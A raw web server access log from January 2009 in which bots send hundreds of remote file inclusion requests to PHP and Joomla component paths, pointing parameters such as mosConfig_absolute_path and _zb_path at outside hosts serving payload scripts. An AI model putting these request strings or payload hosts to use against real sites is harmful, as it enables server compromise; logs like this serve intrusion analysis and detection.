77.221.130.2 - - [04/Jan/2009:08:34:50 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 200 95160 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:34:54 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:34:54 -0800] "GET /logs/default.php?modul=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:34:55 -0800] "GET /logs/access_080606.log///bemarket/postscript/postscript.php?p_mode=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:34:55 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 200 95176 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:34:55 -0800] "GET //bemarket/postscript/postscript.php?p_mode=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:34:56 -0800] "GET /logs///bemarket/postscript/postscript.php?p_mode=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:34:56 -0800] "GET /default.php?modul=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.232.109.160 - - [04/Jan/2009:08:34:58 -0800] "GET /logs/errors.php?error=http://www.mouche.be/components/com_banners/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.232.109.160 - - [04/Jan/2009:08:34:58 -0800] "GET /errors.php?error=http://www.mouche.be/components/com_banners/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:35:01 -0800] "GET /logs/access_080118.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:08:35:04 -0800] "GET /logs/access_080903.log//index.php?DOCUMENT_ROOT=http://www.amp.gob.pa/bot/idow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:08:35:05 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.amp.gob.pa/bot/idow.txt??? HTTP/1.1" 200 94789 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:08:35:06 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.amp.gob.pa/bot/idow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:35:07 -0800] "GET /index2.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:35:10 -0800] "GET /logs/access_080112.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:35:13 -0800] "GET /logs///administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:35:19 -0800] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:35:31 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:35:31 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:35:31 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:35:34 -0800] "GET /logs///book.php5?page=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:35:34 -0800] "GET //book.php5?page=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:41 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:41 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:42 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:35:42 -0800] "GET /logs/access_080606.log///bemarket/postscript/postscript.php?p_mode=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:35:43 -0800] "GET //bemarket/postscript/postscript.php?p_mode=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:35:43 -0800] "GET /logs///bemarket/postscript/postscript.php?p_mode=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:43 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:44 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:44 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:45 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:45 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:45 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:46 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:46 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:47 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:49 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:49 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:50 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:52 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:53 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:35:53 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:35:55 -0800] "GET /logs/access_080914.log//new/bbs//include/write.php?dir=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:35:55 -0800] "GET /new/bbs//include/write.php?dir=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:35:55 -0800] "GET /logs//new/bbs//include/write.php?dir=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:35:59 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:35:59 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:00 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:36:02 -0800] "GET /logs/access_080912.log///calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:36:08 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:08 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:09 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:09 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:36:09 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 200 95295 "-" "libwww-perl/5.811" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:09 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:09 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:09 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:10 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:10 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:10 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:10 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:10 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:10 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:36:12 -0800] "GET /logs/access_080606.log///bemarket/postscript/postscript.php?p_mode=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:36:13 -0800] "GET //bemarket/postscript/postscript.php?p_mode=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:36:13 -0800] "GET /logs///bemarket/postscript/postscript.php?p_mode=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:36:14 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:14 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:14 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:14 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:36:14 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 200 95295 "-" "libwww-perl/5.811" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:14 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:14 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:15 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
87.234.201.76 - - [04/Jan/2009:08:36:17 -0800] "GET /logs/access_081118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:18 -0800] "GET /logs/access_081201.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:36:18 -0800] "GET /logs/access_081206.log/index2.php?table=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:36:20 -0800] "GET /index2.php?table=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:20 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:20 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:20 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:20 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:36:21 -0800] "GET /logs/index2.php?table=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:21 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:21 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:24 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:24 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:24 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:24 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:24 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:25 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:28 -0800] "GET /logs/access_081201.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:36:29 -0800] "GET /logs///administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:36:29 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:31 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:31 -0800] "GET /logs/access_081201.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:31 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:32 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:32 -0800] "GET /logs/access_081201.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:34 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:36:34 -0800] "GET /logs///administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:34 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:35 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
222.66.239.241 - - [04/Jan/2009:08:36:36 -0800] "GET /logs/access_080613.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:37 -0800] "GET /logs/access_081201.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:37 -0800] "GET /logs/access_081201.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:38 -0800] "GET /logs/access_081201.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:39 -0800] "GET /logs/access_081201.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:41 -0800] "GET /logs/access_081201.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:43 -0800] "GET /logs/access_081201.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:44 -0800] "GET /logs/access_081201.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:44 -0800] "GET /logs/access_081201.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:46 -0800] "GET /logs/access_081201.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:47 -0800] "GET /logs/access_081201.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:48 -0800] "GET /logs/access_081201.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:36:51 -0800] "GET /logs/access_081206.log/index2.php?table=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:51 -0800] "GET /logs/access_081201.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:52 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:53 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:36:53 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:36:53 -0800] "GET /index2.php?table=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:36:53 -0800] "GET /logs/index2.php?table=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:36:54 -0800] "GET /logs/access_081201.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:37:00 -0800] "GET /logs/access_081201.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:37:01 -0800] "GET /logs/access_081201.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
